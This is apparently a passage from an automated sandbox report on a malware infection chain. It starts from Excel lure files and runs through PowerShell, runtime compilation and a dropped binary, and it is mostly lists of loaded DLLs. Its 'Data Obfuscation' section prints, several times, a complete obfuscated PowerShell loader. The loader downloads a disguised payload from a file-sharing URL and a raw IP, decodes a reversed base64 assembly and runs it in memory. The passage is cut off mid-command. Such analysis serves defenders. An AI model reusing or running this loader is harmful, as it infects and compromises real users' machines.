          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: dwmapi.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: ntmarta.dll
          Source: C:\Windows\System32\wscript.exeSection loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: wow64win.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: wow64cpu.dll
          Source: C:\Windows\explorer.exeSection loaded: winhttp.dll
          Source: C:\Windows\explorer.exeSection loaded: webio.dll
          Source: C:\Windows\explorer.exeSection loaded: dnsapi.dll
          Source: C:\Windows\explorer.exeSection loaded: rasadhlp.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: wow64win.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeSection loaded: wow64cpu.dll
          Source: C:\Windows\System32\taskeng.exeSection loaded: ktmw32.dll
          Source: C:\Windows\System32\taskeng.exeSection loaded: wevtapi.dll
          Source: C:\Windows\System32\taskeng.exeSection loaded: cryptsp.dll
          Source: C:\Windows\System32\taskeng.exeSection loaded: rpcrtremote.dll
          Source: C:\Windows\System32\taskeng.exeSection loaded: xmllite.dll
          Source: C:\Windows\System32\taskeng.exeSection loaded: dwmapi.dll
          Source: C:\Users\user\AppData\Roaming\vtjrhjiSection loaded: wow64win.dll
          Source: C:\Users\user\AppData\Roaming\vtjrhjiSection loaded: wow64cpu.dll
          Source: C:\Users\user\AppData\Roaming\vtjrhjiSection loaded: version.dll
          Source: C:\Users\user\AppData\Roaming\vtjrhjiSection loaded: vcruntime140_clr0400.dll
          Source: C:\Users\user\AppData\Roaming\vtjrhjiSection loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wow64win.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wow64cpu.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: explorerframe.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: duser.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dui70.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: slc.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: secur32.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: bcrypt.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: webio.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: vaultcli.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winnsi.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dhcpcsvc6.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dhcpcsvc.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: credssp.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dnsapi.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: rasadhlp.dll
          Source: C:\Windows\explorer.exeSection loaded: explorerframe.dll
          Source: C:\Windows\explorer.exeSection loaded: duser.dll
          Source: C:\Windows\explorer.exeSection loaded: dui70.dll
          Source: C:\Windows\explorer.exeSection loaded: uxtheme.dll
          Source: C:\Windows\explorer.exeSection loaded: powrprof.dll
          Source: C:\Windows\explorer.exeSection loaded: dwmapi.dll
          Source: C:\Windows\explorer.exeSection loaded: slc.dll
          Source: C:\Windows\explorer.exeSection loaded: secur32.dll
          Source: C:\Windows\explorer.exeSection loaded: propsys.dll
          Source: C:\Windows\explorer.exeSection loaded: dnsapi.dll
          Source: C:\Windows\explorer.exeSection loaded: winhttp.dll
          Source: C:\Windows\explorer.exeSection loaded: webio.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wow64win.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wow64cpu.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: explorerframe.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: duser.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dui70.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: slc.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: secur32.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dnsapi.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: webio.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wow64win.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wow64cpu.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: explorerframe.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: duser.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dui70.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: slc.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: secur32.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: webio.dll
          Source: C:\Windows\explorer.exeSection loaded: explorerframe.dll
          Source: C:\Windows\explorer.exeSection loaded: duser.dll
          Source: C:\Windows\explorer.exeSection loaded: dui70.dll
          Source: C:\Windows\explorer.exeSection loaded: uxtheme.dll
          Source: C:\Windows\explorer.exeSection loaded: powrprof.dll
          Source: C:\Windows\explorer.exeSection loaded: dwmapi.dll
          Source: C:\Windows\explorer.exeSection loaded: slc.dll
          Source: C:\Windows\explorer.exeSection loaded: secur32.dll
          Source: C:\Windows\explorer.exeSection loaded: propsys.dll
          Source: C:\Windows\explorer.exeSection loaded: winhttp.dll
          Source: C:\Windows\explorer.exeSection loaded: webio.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wow64win.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wow64cpu.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: explorerframe.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: duser.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dui70.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: slc.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: secur32.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dnsapi.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: webio.dll
          Source: C:\Windows\explorer.exeSection loaded: explorerframe.dll
          Source: C:\Windows\explorer.exeSection loaded: duser.dll
          Source: C:\Windows\explorer.exeSection loaded: dui70.dll
          Source: C:\Windows\explorer.exeSection loaded: uxtheme.dll
          Source: C:\Windows\explorer.exeSection loaded: powrprof.dll
          Source: C:\Windows\explorer.exeSection loaded: dwmapi.dll
          Source: C:\Windows\explorer.exeSection loaded: slc.dll
          Source: C:\Windows\explorer.exeSection loaded: secur32.dll
          Source: C:\Windows\explorer.exeSection loaded: propsys.dll
          Source: C:\Windows\explorer.exeSection loaded: dnsapi.dll
          Source: C:\Windows\explorer.exeSection loaded: winhttp.dll
          Source: C:\Windows\explorer.exeSection loaded: webio.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wow64win.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wow64cpu.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: explorerframe.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: duser.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dui70.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: slc.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: secur32.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dnsapi.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: winhttp.dll
          Source: C:\Windows\SysWOW64\explorer.exeSection loaded: webio.dll
          Source: C:\Windows\explorer.exeSection loaded: explorerframe.dll
          Source: C:\Windows\explorer.exeSection loaded: duser.dll
          Source: C:\Windows\explorer.exeSection loaded: dui70.dll
          Source: C:\Windows\explorer.exeSection loaded: uxtheme.dll
          Source: C:\Windows\explorer.exeSection loaded: powrprof.dll
          Source: C:\Windows\explorer.exeSection loaded: dwmapi.dll
          Source: C:\Windows\explorer.exeSection loaded: slc.dll
          Source: C:\Windows\explorer.exeSection loaded: secur32.dll
          Source: C:\Windows\explorer.exeSection loaded: propsys.dll
          Source: C:\Windows\explorer.exeSection loaded: dnsapi.dll
          Source: C:\Windows\explorer.exeSection loaded: winhttp.dll
          Source: C:\Windows\explorer.exeSection loaded: webio.dll
          Source: C:\Windows\System32\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
          Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
          Source: PORTS SITUATION BULK CARRIERS.xlsx.0.drInitial sample: OLE zip file path = xl/calcChain.xml
          Source: PORTS SITUATION BULK CARRIERS.xlsx.0.drInitial sample: OLE zip file path = docProps/thumbnail.wmf
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
          Source: #U3010TW-S PO#U3011PO#3311-20241118003.xlsStatic file information: File size 1181184 > 1048576
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: Binary string: 7C:\Users\user\AppData\Local\Temp\mffkkngw\mffkkngw.pdbhP source: powershell.exe, 00000013.00000002.494305051.00000000026DA000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: 7C:\Users\user\AppData\Local\Temp\03wlztsz\03wlztsz.pdb source: powershell.exe, 00000006.00000002.447990130.0000000002281000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: aspnet_compiler.pdb source: vtjrhji, 00000024.00000000.566239808.0000000000F72000.00000020.00000001.01000000.0000000A.sdmp, vtjrhji.31.dr
          Source: Binary string: 7C:\Users\user\AppData\Local\Temp\03wlztsz\03wlztsz.pdbhP source: powershell.exe, 00000006.00000002.447990130.0000000002281000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: 7C:\Users\user\AppData\Local\Temp\mffkkngw\mffkkngw.pdb source: powershell.exe, 00000013.00000002.494305051.000000000218B000.00000004.00000800.00020000.00000000.sdmp
          Source: PORTS SITUATION BULK CARRIERS.xlsx.0.drInitial sample: OLE indicators vbamacros = False
          Source: #U3010TW-S PO#U3011PO#3311-20241118003.xlsInitial sample: OLE indicators encrypted = True

          Data Obfuscation

          barindex
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('seYimageU'+'rl = PuIht'+'tps'+':'+'//1017.filemail.com/api/fil'+'e/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvSt'+'GrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f PuI;seYwebClient = New-Object System.Net.W'+'ebClient;seYimageBytes = seYwebClien'+'t.DownloadData(seYimageUrl);seYimag'+'eText = [System.Text.Encoding]::UTF8.GetString(seYimageByt'+'es);seYstartFlag = PuI<<BASE64_'+'START>>PuI;seYendF'+'lag = PuI'+'<<BASE64_END>>PuI;seYstartIndex = seYimageText.IndexOf('+'seYstartFlag);seYend'+'Index = seYimageText.IndexOf(seYendFlag);s'+'eYstartIndex -ge 0 -and seYendIndex -gt seYstartIndex;s'+'eYstartIndex += seYstartFlag.Length;seYbase64Length = seYendIndex - seYstartIndex;seYbase64Command ='+' se'+'Yimag'+'eT'+'ext.Substring(seYstartIndex,'+' seYbase64Length);seYbase64Reversed = -join (seYbase64Command'+'.ToCharArray() 2pO ForE'+'ach-Object { seY_ })[-1..-(seY'+'base64Command.Length)];seY'+'commandBytes = [System.C'+'onvert]::FromBase64String('+'seYbase64Reversed);seY'+'loadedAssembly = [System.Refl'+'ection.Assembly]'+'::Load(seYcommandBytes);seYvaiMethod = ['+'dnlib.IO.Home].GetMethod(PuIVAIPuI);seYvaiMe'+'thod.Invo'+'ke(seYnull, @(PuItxt.TGRFFRW/35/871.44.271.701//'+':ptthPuI, PuIdesativadoPuI, PuId'+'esativadoPuI, Pu'+'IdesativadoPuI, PuIaspnet_compil'+'erPuI, PuIdesativadoPuI, '+'PuIdesativadoPuI,PuIdesativado'+'PuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuI1PuI,PuIdesativadoPuI));').rEPlaCE('PuI',[StrInG][CHAR]39).rEPlaCE('2pO','|').rEPlaCE('seY','$')| . ((gV '*Mdr*').nAmE[3,11,2]-jOIN'')"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('seYimageU'+'rl = PuIht'+'tps'+':'+'//1017.filemail.com/api/fil'+'e/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvSt'+'GrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f PuI;seYwebClient = New-Object System.Net.W'+'ebClient;seYimageBytes = seYwebClien'+'t.DownloadData(seYimageUrl);seYimag'+'eText = [System.Text.Encoding]::UTF8.GetString(seYimageByt'+'es);seYstartFlag = PuI<<BASE64_'+'START>>PuI;seYendF'+'lag = PuI'+'<<BASE64_END>>PuI;seYstartIndex = seYimageText.IndexOf('+'seYstartFlag);seYend'+'Index = seYimageText.IndexOf(seYendFlag);s'+'eYstartIndex -ge 0 -and seYendIndex -gt seYstartIndex;s'+'eYstartIndex += seYstartFlag.Length;seYbase64Length = seYendIndex - seYstartIndex;seYbase64Command ='+' se'+'Yimag'+'eT'+'ext.Substring(seYstartIndex,'+' seYbase64Length);seYbase64Reversed = -join (seYbase64Command'+'.ToCharArray() 2pO ForE'+'ach-Object { seY_ })[-1..-(seY'+'base64Command.Length)];seY'+'commandBytes = [System.C'+'onvert]::FromBase64String('+'seYbase64Reversed);seY'+'loadedAssembly = [System.Refl'+'ection.Assembly]'+'::Load(seYcommandBytes);seYvaiMethod = ['+'dnlib.IO.Home].GetMethod(PuIVAIPuI);seYvaiMe'+'thod.Invo'+'ke(seYnull, @(PuItxt.TGRFFRW/35/871.44.271.701//'+':ptthPuI, PuIdesativadoPuI, PuId'+'esativadoPuI, Pu'+'IdesativadoPuI, PuIaspnet_compil'+'erPuI, PuIdesativadoPuI, '+'PuIdesativadoPuI,PuIdesativado'+'PuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuI1PuI,PuIdesativadoPuI));').rEPlaCE('PuI',[StrInG][CHAR]39).rEPlaCE('2pO','|').rEPlaCE('seY','$')| . ((gV '*Mdr*').nAmE[3,11,2]-jOIN'')"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('seYimageU'+'rl = PuIht'+'tps'+':'+'//1017.filemail.com/api/fil'+'e/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvSt'+'GrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f PuI;seYwebClient = New-Object System.Net.W'+'ebClient;seYimageBytes = seYwebClien'+'t.DownloadData(seYimageUrl);seYimag'+'eText = [System.Text.Encoding]::UTF8.GetString(seYimageByt'+'es);seYstartFlag = PuI<<BASE64_'+'START>>PuI;seYendF'+'lag = PuI'+'<<BASE64_END>>PuI;seYstartIndex = seYimageText.IndexOf('+'seYstartFlag);seYend'+'Index = seYimageText.IndexOf(seYendFlag);s'+'eYstartIndex -ge 0 -and seYendIndex -gt seYstartIndex;s'+'eYstartIndex += seYstartFlag.Length;seYbase64Length = seYendIndex - seYstartIndex;seYbase64Command ='+' se'+'Yimag'+'eT'+'ext.Substring(seYstartIndex,'+' seYbase64Length);seYbase64Reversed = -join (seYbase64Command'+'.ToCharArray() 2pO ForE'+'ach-Object { seY_ })[-1..-(seY'+'base64Command.Length)];seY'+'commandBytes = [System.C'+'onvert]::FromBase64String('+'seYbase64Reversed);seY'+'loadedAssembly = [System.Refl'+'ection.Assembly]'+'::Load(seYcommandBytes);seYvaiMethod = ['+'dnlib.IO.Home].GetMethod(PuIVAIPuI);seYvaiMe'+'thod.Invo'+'ke(seYnull, @(PuItxt.TGRFFRW/35/871.44.271.701//'+':ptthPuI, PuIdesativadoPuI, PuId'+'esativadoPuI, Pu'+'IdesativadoPuI, PuIaspnet_compil'+'erPuI, PuIdesativadoPuI, '+'PuIdesativadoPuI,PuIdesativado'+'PuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuIdesativadoPuI,PuI1PuI,PuIdesativadoPuI));').rEPlaCE('PuI',[StrInG][CHAR]39).rEPlaCE('2pO','|').rEPlaCE('seY','$')| . ((gV '*Mdr*').nAmE[3,11,2]-jOIN'')"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('seYimageU'+'rl = PuIht'+'tps'+':'+'//1017.filemail.com/api/fil'+'e/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvSt'+'GrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f PuI;seYwebClient = New-Object System.Net.W'+'ebClient;seYimageBytes = seYwebClien'+'t.DownloadData(seYimageUrl);seYimag'+'eText = [System.Text.Encoding]::UTF8.GetString(seYimageByt'+'es);seYstartFlag = PuI<<BASE64_'+'START>>PuI;seYendF'+'lag = PuI'+'<<BASE64_END>>PuI;seYstartIndex = seYimageText.IndexOf('+'seYstartFlag);seYend'+'Index = seYimageText.IndexOf(seYendFlag);s'+'eYstartIndex -ge 0 -and seYendIndex -gt seYstartIndex;s'+'eYstartIndex += seYstartFlag.Length;seYbase64Length = seYendIndex - seYstartIndex;seYbase64Command ='+' se'+'Yimag'+'eT'+'ext.Substring(seYstartIndex,'+' seYbase64Length);seYbase64Reversed = -join (seYbase64Command'+'.ToCharArray() 2pO ForE'+'ach-Object { seY_ })[-1..-(seY'+'base64Command.Length)];seY'+'commandBytes = [System.C'+'onvert]::FromBase64String('+'seYbase64Reversed);seY'+'loadedAssembly = [System.Refl'+'ection.Assembly]'+'::Load(seYcommandBytes);seYvaiMethod = ['+'dnlib.IO.Home].GetMethod(PuIVAIPuI);seYvaiMe'+'thod.Invo'+'ke(seYnull, @(PuItxt.TGRFFRW/35/871.44.271.701//'+':ptthPuI, PuIdesativadoPuI, PuId'+'esativadoPuI, Pu'+'IdesativadoPuI, PuIaspnet_compil'+'erPuI, PuIdesativadoPuI, 